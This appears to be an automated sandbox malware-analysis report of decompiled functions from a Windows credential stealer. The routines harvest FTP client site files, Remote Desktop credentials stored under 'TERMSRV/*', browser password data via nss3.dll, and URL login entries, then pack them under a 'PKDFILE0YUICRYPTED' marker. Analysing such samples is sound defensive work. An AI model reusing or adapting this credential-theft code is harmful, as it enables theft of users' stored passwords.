FTP Navigator, xrefs: 00405BE8
ftplist.txt, xrefs: 00405C03, 00405C31

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
Instruction ID: 36e39a21a9329dbe8d23580b16dfc1acef3c6298e5863b6ab1a3678991a917a5
Opcode Fuzzy Hash: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
Instruction Fuzzy Hash: 1401C870504511FAEB1136228C02FEF3E5ADB82354F24413BB854751E6D77C5FC29AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFF0, Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040CFF0(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				char* _t8;
				void* _t17;
				void* _t18;
				char* _t19;

				_t18 = __ecx;
				_t17 = __ebx;
				_v8 = E004015F0(_a4, 0x46, 0);
				_t19 =  *0x4147ed; // 0x640b38
				if( *_t19 == 0) {
					L7:
					return E00401636(_t17, _t18, _t19, _t23, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t8 = StrStrIA(_t19, "FTPNow");
					_t21 = _t8;
					if(_t8 == 0) {
						__eflags = StrStrIA(_t19, "FTP Now");
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t14 = E0040242B(_t21, _t19);
						if(E0040242B(_t21, _t19) != 0) {
							E00404351(_a4, _t14, "sites.xml", 0xbeef0000);
							E004018B8(_t14);
						}
						goto L6;
					}
					goto L4;
					L6:
					asm("cld");
					_t18 = 0xffffffff;
					asm("repne scasb");
					_t23 =  *_t19;
				} while ( *_t19 != 0);
				goto L7;
			}

0x0040cff0
0x0040cff0
0x0040d003
0x0040d006
0x0040d00f
0x0040d062
0x0040d06f
0x00000000
0x00000000
0x00000000
0x0040d011
0x0040d011
0x0040d017
0x0040d01c
0x0040d01e
0x0040d02d
0x0040d02f
0x00000000
0x00000000
0x0040d031
0x0040d037
0x0040d039
0x0040d04a
0x0040d04f
0x0040d04f
0x00000000
0x0040d039
0x00000000
0x0040d054
0x0040d054
0x0040d057
0x0040d05c
0x0040d05e
0x0040d05e
0x00000000

APIs

StrStrIA.SHLWAPI(00640B38,FTPNow), ref: 0040D017
StrStrIA.SHLWAPI(00640B38,FTP Now,00640B38,FTPNow), ref: 0040D028

Strings

FTPNow, xrefs: 0040D011
sites.xml, xrefs: 0040D041
FTP Now, xrefs: 0040D022

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
Instruction ID: ec990e8c8fde0540a055802f0a5bafa42fe6efae90b5ffc829ae8747faa2dcf0
Opcode Fuzzy Hash: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
Instruction Fuzzy Hash: 04F08670900101B5DB3136758C42FAF3A999B8275CF14413BB928B11E6E6BCCEC692AD

Uniqueness

Uniqueness Score: -1.00%

Function 00408293, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00408293(void* _a4, signed int _a8, short* _a12, signed int _a16) {
				char _v20;
				char _v28;
				void _v36;
				void _v60;
				void* _v64;
				intOrPtr _v68;
				signed int _t50;
				signed int _t54;
				void* _t57;
				void* _t63;
				signed int _t77;
				int _t79;
				char* _t84;
				int _t99;
				unsigned int _t119;
				unsigned int _t120;
				void* _t123;
				void* _t126;
				short* _t128;
				int _t130;

				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					return 0;
				} else {
					_t50 = _a8 & 0x00000007;
					if(_a8 == 0 || _t50 != 0) {
						return 0;
					} else {
						_t54 = _a16 & 0x00000007;
						if(_a16 == 0 || _t54 != 0) {
							return 0;
						} else {
							_t84 = 0;
							_push(_a8);
							_pop( *_t10);
							_v68 = _v68 + 0xb;
							_t57 = E004018CF(_v68);
							asm("cld");
							_v64 = _t57;
							memcpy(_v64, 0x415d0a, 0xb);
							memcpy(0x415d20, _a4, _a8);
							E00402497(0, _v64, _v68,  &_v20);
							E004018B8(_v64);
							_push(_a8);
							_pop( *_t23);
							_v68 = _v68 + 0x1b;
							_t63 = E004018CF(_v68);
							_v64 = _t63;
							asm("cld");
							_v64 = _t63;
							_t123 =  &_v20;
							memcpy(_v64, _t123, 0x10);
							memcpy(_t123 + 0x20, 0x415d0a, 0xb);
							memcpy(0x415d20, _a4, _a8);
							E00402497(0, _v64, _v68,  &_v36);
							E004018B8(_v64);
							asm("cld");
							_t126 =  &_v20;
							memcpy( &_v60, _t126, 0x10);
							memcpy(_t126 + 0x20,  &_v36, 8);
							E0041274B( &_v60, 1);
							_t128 = _a12;
							_t119 = _a16 >> 3;
							if(_t119 != 0) {
								while(1) {
									_t120 = _t119;
									if(_t120 == 0) {
										break;
									}
									E004129F6( &_v28, _t128, _t128,  &_v28);
									_t128 = _t128 + 8;
									_t119 = _t120 - 1;
								}
								_t77 =  *(_t128 - 1) & 0x000000ff;
								if(_t77 <= 8) {
									_t128 = _t128 - _t77;
								}
								_t130 = _t128 - _a12 >> 1;
								_t79 = WideCharToMultiByte(0, 0, _a12, _t130, 0, 0, 0, 0);
								if(_t79 != 0) {
									_t84 = E004018CF(_t79);
									_t99 = _t79;
									if(WideCharToMultiByte(0, 0, _a12, _t130, _t84, _t99, 0, 0) == 0) {
										E004018B8(_t84);
										_t84 = 0;
									}
								}
							}
							return _t84;
						}
					}
				}
			}

0x004082a0
0x004082ba
0x004082bd
0x004082c0
0x004082c7
0x004082d3
0x004082d6
0x004082d9
0x004082e0
0x004082ec
0x004082ef
0x004082ef
0x004082f1
0x004082f4
0x004082f7
0x004082fe
0x00408303
0x00408304
0x00408314
0x0040831c
0x00408328
0x00408330
0x00408335
0x00408338
0x0040833b
0x00408342
0x00408347
0x0040834a
0x0040834b
0x0040834e
0x00408359
0x00408365
0x0040836d
0x00408379
0x00408381
0x00408386
0x00408387
0x00408392
0x0040839c
0x004083a4
0x004083a9
0x004083b2
0x004083b4
0x004083c7
0x004083c7
0x004083c9
0x00000000
0x00000000
0x004083be
0x004083c3
0x004083c6
0x004083c6
0x004083cb
0x004083d2
0x004083d4
0x004083d4
0x004083d9
0x004083f0
0x004083f2
0x004083fb
0x004083fd
0x00408413
0x00408416
0x0040841b
0x0040841b
0x00408413
0x004083f2
0x00408423
0x00408423
0x004082e0
0x004082c7

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,?,0000001B), ref: 004083EB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040840C

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

]A, xrefs: 0040830A
]A, xrefs: 0040835B

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$FreeLocal
String ID: ]A$]A
API String ID: 2558778219-3231057216
Opcode ID: 286f599ee0104cdff65b136c5913ff6fd88c7d42950f5473b72151dfc2a1154f
Instruction ID: b5c686e66aa75bb0ea5c3a45f9d24023e4dde9a45453e9509f1690b0b28c1787
Opcode Fuzzy Hash: 286f599ee0104cdff65b136c5913ff6fd88c7d42950f5473b72151dfc2a1154f
Instruction Fuzzy Hash: 6F518F72A00219AFEF10AE65EC45BDF7BA5FB80314F00843AF950B72D1DBB99D10DA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C587, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040C587(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, char* _a8) {
				short* _v8;
				int _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t37;
				intOrPtr _t42;
				intOrPtr _t47;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = __ebx;
				if( *0x414afb != 0) {
					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
					_v8 = E004018CF(_v12);
					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
					_t37 =  *0x414afb(_v8, 0, 0x12, 0, 0,  &_v16);
					__eflags = _t37;
					if(_t37 >= 0) {
						_t54 =  *_v16;
						__eflags =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
						if(__eflags >= 0) {
							_t42 = E00401082(_t40, __edi, __eflags, _v20);
							_v28 = _t42;
							_t43 = _t42;
							__eflags = _t42;
							if(__eflags != 0) {
								_v24 = E004018CF(_v28);
								_push(_v20);
								_t47 = E00401133(E004012BB(_t45, __eflags), __eflags, _v20, _v24, _v28);
								__eflags = _t47;
								if(_t47 != 0) {
									E00401569(_a4, 0xbeef0000);
									E0040159F(_a4, _v24, _v28);
								}
								_t43 = E004018B8(_v24);
							}
							E00401021(_t43, _t51, _t52, _t54, __eflags, _v20);
						}
						 *((intOrPtr*)( *_v16 + 8))(_v16);
					}
					return E004018B8(_v8);
				} else {
					return __eax;
				}
			}

0x0040c587
0x0040c587
0x0040c594
0x0040c5ac
0x0040c5b7
0x0040c5c9
0x0040c5dd
0x0040c5e3
0x0040c5e5
0x0040c5ee
0x0040c605
0x0040c607
0x0040c60c
0x0040c611
0x0040c614
0x0040c614
0x0040c616
0x0040c620
0x0040c623
0x0040c634
0x0040c639
0x0040c63b
0x0040c645
0x0040c653
0x0040c653
0x0040c65b
0x0040c65b
0x0040c663
0x0040c663
0x0040c670
0x0040c670
0x0040c67c
0x0040c597
0x0040c597
0x0040c597

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD

Strings

Settings, xrefs: 0040C5FA

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: 6a5d9ff359ebca6df1bfba1a1f3bb88f09d5ea77f9709e3dbdcf255383de8aa2
Instruction ID: 45371d5192e4b28a761186b6385347240049983ed8c7a30cfb32e2f7b06d0ba5
Opcode Fuzzy Hash: 6a5d9ff359ebca6df1bfba1a1f3bb88f09d5ea77f9709e3dbdcf255383de8aa2
Instruction Fuzzy Hash: E431CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B611791F1D7759A50AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004017D5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004017D5(void* __ecx, void* __edi, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void** _t27;
				intOrPtr _t30;
				int _t38;
				signed int _t40;
				signed int _t41;
				signed int _t44;
				signed int _t55;

				_t44 = 0;
				_t27 =  &_v8;
				_push(_t27);
				_push(_a4);
				L00410790();
				_t53 = _t27;
				if(_t27 >= 0) {
					_t30 = E00401082(_t27, __edi, _t53, _a4);
					_v16 = _t30;
					GlobalFix(_v8);
					_t27 = _t30;
					_t54 = _t27;
					if(_t27 != 0) {
						_v20 = _t27;
						_v24 = E004018CF(E00411E92() + 0x500000);
						_v28 = E004018CF(E00411E98(_v16) + 0x100000);
						_v12 = E00411EA6(_v20, _v28, _v16, _v24, 0, _v16);
						_t38 = GlobalUnWire(_v8);
						_push(_a4);
						E0040131F(_t38, _t54);
						_t40 = E0040157E(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
						_t41 = E00401569(_a4, _v16);
						_t44 = _t40 & _t41 & E0040159F(_a4, _v28, _v12);
						_t55 = _t44;
						E004018B8(_v24);
						_t27 = E004018B8(_v28);
					}
				}
				_push(_a4);
				E0040129A(_t27, _t55);
				return _t44;
			}

0x004017dc
0x004017de
0x004017e1
0x004017e2
0x004017e5
0x004017ea
0x004017ec
0x004017f5
0x004017fa
0x00401800
0x00401805
0x00401805
0x00401807
0x0040180d
0x00401826
0x0040183f
0x00401858
0x0040185e
0x00401863
0x00401866
0x00401875
0x00401882
0x00401897
0x00401897
0x0040189c
0x004018a4
0x004018a4
0x00401807
0x004018a9
0x004018ac
0x004018b5

APIs

73D83240.OLE32(?,?), ref: 004017E5
GlobalFix.KERNEL32 ref: 00401800

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

GlobalUnWire.KERNEL32 ref: 0040185E

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: GlobalLocal$AllocD83240FreeWire
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 2065937090-258907703
Opcode ID: c4eae462b65c8d0557db90d01b8eb71803dbf67a8bd34dab7953d3abd0a8b25e
Instruction ID: ebbbe2b59391e3aaee2ab6b6a4edf92b2b65332d5e813d2d7ef502307b157ca4
Opcode Fuzzy Hash: c4eae462b65c8d0557db90d01b8eb71803dbf67a8bd34dab7953d3abd0a8b25e
Instruction Fuzzy Hash: E921EC72D00109BBEF017FE1CC42AAD7E76EF10344F10807ABA10751B1E77A9A609B98

Uniqueness

Uniqueness Score: -1.00%

Function 00408568, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408568(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _t47;
				char* _t49;
				char** _t50;
				void* _t57;
				char* _t70;
				char* _t73;
				char* _t74;
				char* _t75;
				char* _t76;
				void* _t77;

				_t77 = __eflags;
				_t72 = __ecx;
				_t71 = __ebx;
				E004013E8(_t47, __ebx, __ecx, _a4, 1, _a16);
				_t49 = E00401364(_t77, _a4, _a16);
				_t75 = _t49;
				while(1) {
					_t76 = _t75;
					if(_t76 == 0) {
						break;
					}
					_t50 = _a16;
					__eflags =  *_t50;
					if( *_t50 == 0) {
						return _t50;
					}
					_v8 = 0;
					_t73 = E004084A7(_t71, _t72, _a4, _a12, _a16,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						_v24 = 0;
					} else {
						_t70 = StrStrIA(_v8, "http://");
						__eflags = _t70;
						if(_t70 == 0) {
							_t70 = StrStrIA(_v8, "https://");
						}
						_v24 = _t70;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E004015CB(E00401569(_a8, 0xbeef0001), _a8, _v8);
					}
					while(1) {
						_t74 = _t73;
						__eflags = _t74;
						if(_t74 == 0) {
							break;
						}
						__eflags =  *_a16;
						if( *_a16 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							_t57 = E00408524(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
							__eflags = _v24;
							if(_v24 != 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										L17:
										E004015CB(E004015CB(E004015CB(_t57, _a8, _v12), _a8, _v16), _a8, _v20);
									} else {
										__eflags = _v20;
										if(_v20 != 0) {
											goto L17;
										}
									}
								}
							}
							E004018B8(_v12);
							E004018B8(_v16);
							E004018B8(_v20);
							_t73 = _t74 - 1;
							__eflags = _t73;
							continue;
						} else {
						}
						break;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E00401569(_a8, 0);
						E00401569(_a8, 0);
						E00401569(_a8, 0);
					}
					_t49 = E004018B8(_v8);
					_t75 = _t76 - 1;
					__eflags = _t75;
				}
				return _t49;
			}

0x00408568
0x00408568
0x00408568
0x00408578
0x00408583
0x00408588
0x004086ca
0x004086ca
0x004086cc
0x00000000
0x00000000
0x0040858f
0x00408592
0x00408595
0x00000000
0x00000000
0x0040859c
0x004085b5
0x004085b7
0x004085bb
0x004085e0
0x004085bd
0x004085ca
0x004085ca
0x004085cc
0x004085d6
0x004085d6
0x004085db
0x004085db
0x004085e7
0x004085eb
0x00408600
0x00408600
0x00408695
0x00408695
0x00408695
0x00408697
0x00000000
0x00000000
0x0040860d
0x00408610
0x00408617
0x0040861e
0x00408625
0x0040863e
0x00408643
0x00408647
0x00408649
0x0040864d
0x0040864f
0x00408653
0x0040865b
0x00408677
0x00408655
0x00408655
0x00408659
0x00000000
0x00000000
0x00408659
0x00408653
0x0040864d
0x0040867f
0x00408687
0x0040868f
0x00408694
0x00408694
0x00000000
0x00000000
0x00408612
0x00000000
0x00408610
0x0040869d
0x004086a1
0x004086a8
0x004086b2
0x004086bc
0x004086bc
0x004086c4
0x004086c9
0x004086c9
0x004086c9
0x004086d5

Strings

https://, xrefs: 004085CE
http://, xrefs: 004085BD

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: 3d177ae434288baa113bf2edf4519cd5214faf81bde89a66f72c30d4eebda108
Instruction ID: 36914738dcc24f5284e4ebbc1b9eef358293ae7963248e41ec2cf401613fd4ce
Opcode Fuzzy Hash: 3d177ae434288baa113bf2edf4519cd5214faf81bde89a66f72c30d4eebda108
Instruction Fuzzy Hash: 6C411931800109FADF12AF91CE05BDE7BB6AF40358F10853AB551791F1CB7A4B90EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401AEC, Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401AEC(void* __ecx, void* __edi, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v278;
				signed int _v284;
				signed int _t27;
				void** _t29;
				intOrPtr _t32;
				void* _t40;
				signed int _t43;
				signed int _t45;
				void* _t47;
				signed int _t51;

				_t47 = __ecx;
				_t27 = GetTickCount();
				asm("rol eax, 0xb");
				_v284 =  !_t27;
				_t45 = 0;
				_t29 =  &_v8;
				_push(_t29);
				_push(_a4);
				L00410790();
				_t49 = _t29;
				if(_t29 >= 0) {
					_t32 = E00401082(_t29, __edi, _t49, _a4);
					_v16 = _t32;
					GlobalFix(_v8);
					_t29 = _t32;
					_t50 = _t29;
					if(_t29 != 0) {
						_v20 = _t29;
						_v12 = E004018CF(_v16);
						E00401906(_v20, _v12, _v16);
						GlobalUnWire(_v8);
						E0040193F(_t47, _t50,  &_v278,  &_v284, 4);
						_t40 = E004019AA( &_v278, _v12, _v16);
						_push(_a4);
						E0040131F(_t40, _t50);
						_t43 = E0040157E(_a4,  &_v284, 4);
						_t45 = _t43 & E0040157E(_a4, _v12, _v16);
						_t51 = _t45;
						_t29 = E004018B8(_v12);
					}
				}
				_push(_a4);
				E0040129A(_t29, _t51);
				return _t45;
			}

0x00401aec
0x00401af6
0x00401afb
0x00401b00
0x00401b06
0x00401b08
0x00401b0b
0x00401b0c
0x00401b0f
0x00401b14
0x00401b16
0x00401b1f
0x00401b24
0x00401b2a
0x00401b2f
0x00401b2f
0x00401b31
0x00401b33
0x00401b3e
0x00401b4a
0x00401b52
0x00401b67
0x00401b79
0x00401b7e
0x00401b81
0x00401b92
0x00401ba7
0x00401ba7
0x00401bac
0x00401bac
0x00401b31
0x00401bb1
0x00401bb4
0x00401bbd

APIs

GetTickCount.KERNEL32 ref: 00401AF6
73D83240.OLE32(?,?), ref: 00401B0F
GlobalFix.KERNEL32 ref: 00401B2A

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

GlobalUnWire.KERNEL32 ref: 00401B52

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: GlobalLocal$AllocCountD83240FreeTickWire
String ID:
API String ID: 462972100-0
Opcode ID: b9874f5c6deaf341b335be248c940a421b75c7ff6a78c87e761cedec48a48445
Instruction ID: 621e9e9be75d07b42097c487be39cb2d33a31aa4828135fb6f0f97c2ff2c831f
Opcode Fuzzy Hash: b9874f5c6deaf341b335be248c940a421b75c7ff6a78c87e761cedec48a48445
Instruction Fuzzy Hash: 21219875D0010CBEDF01AFA1DC429DDBB7AAF04344F0040B6BA15B51B1DB799BA5AB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC29, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CC29(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char* _t29;
				char* _t31;

				E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _a8), _a4, _a12);
				E0040159F(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x41679f);
				if(_t29 == 0) {
					_push("TERMSRV/");
					L0041066A();
					_v12 = _t29;
					_t31 = StrStrIA(_a12, "TERMSRV/");
					if(_t31 != 0) {
						_a12 = _t31;
					}
					_t29 = E004037C6(_t31, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E004015CB(E00401569(_a4, 0xbeef0001), _a4, _a8);
						E00401569(_a4, _v8);
						return E0040159F(_a4, _a16, _a20);
					}
				}
				return _t29;
			}

0x0040cc4d
0x0040cc5b
0x0040cc6d
0x0040cc6f
0x0040cc71
0x0040cc76
0x0040cc7b
0x0040cc8b
0x0040cc8d
0x0040cc92
0x0040cc92
0x0040cc98
0x0040cca0
0x0040cca2
0x0040ccb8
0x0040ccc3
0x00000000
0x0040ccd1
0x0040cca0
0x0040ccd7

APIs

Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7

StrStrIA.SHLWAPI(?,0041679F), ref: 0040CC68
lstrlen.KERNEL32(TERMSRV/,?,0041679F), ref: 0040CC76
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041679F), ref: 0040CC86

Strings

TERMSRV/, xrefs: 0040CC71, 0040CC7E

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: cbae450a8c29367f078cf42c0da4fa7866791775ea3b89897ef4164960869c3e
Instruction ID: 0e33322fa43a7393c9c901e98c28ddf77560ff6a40d7ebd916c261fa5b4e0482
Opcode Fuzzy Hash: cbae450a8c29367f078cf42c0da4fa7866791775ea3b89897ef4164960869c3e
Instruction Fuzzy Hash: B011A835410109FFDF026F61CD428DD3E62AF44398F104536B929791F1DB7A8AB1AB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409061, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00409074
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409095

Strings

nss3.dll, xrefs: 0040909F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
Instruction ID: 79ef5b793eaa19e43d16629d1b832ed7db9b7e222fb3f2d26c77b95c4dd7ac76
Opcode Fuzzy Hash: 120aac01b1d19bf89567df46df9f15ac37a0c958acc84ce813f69d2bc8fe1057
Instruction Fuzzy Hash: E811A170602101EFDB106F68EE8E7C93FB1BB84385F01C436E111A92E2E7B9CC918A4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCDA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040CCDA(intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _t17;
				intOrPtr* _t23;
				void* _t25;

				if( *0x414b0f != 0 &&  *0x414b0b != 0 &&  *0x414b43 != 0) {
					_v8 = 0;
					_v12 = 0;
					_t17 =  *0x414b0b("TERMSRV/*", 0,  &_v12,  &_v8);
					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
						_t23 = _v8;
						while(_v12 != 0 &&  *_t23 != 0) {
							E0040CC29(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t25 = _t23;
							_v12 = _v12 - 1;
							_t23 = _t25 + 4;
							__eflags = _t23;
						}
						return  *0x414b0f(_v8);
					}
				}
				return _t17;
			}

0x0040cce8
0x0040ccfc
0x0040cd03
0x0040cd1f
0x0040cd21
0x0040cd2f
0x0040cd52
0x0040cd46
0x0040cd4b
0x0040cd4c
0x0040cd4f
0x0040cd4f
0x0040cd4f
0x00000000
0x0040cd60
0x0040cd21
0x0040cd68

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
CredFree.ADVAPI32(00000000), ref: 0040CD60

Strings

TERMSRV/*, xrefs: 0040CD14

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
Instruction ID: 46919d1b78b4c4f98928751ff711c86717132dd267c8420e9221b8d9fce6a23c
Opcode Fuzzy Hash: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
Instruction Fuzzy Hash: 91112731804204EBDF319F94C9887DABBB4AF05705F14827BA501721E0C379AF85DB89

Uniqueness

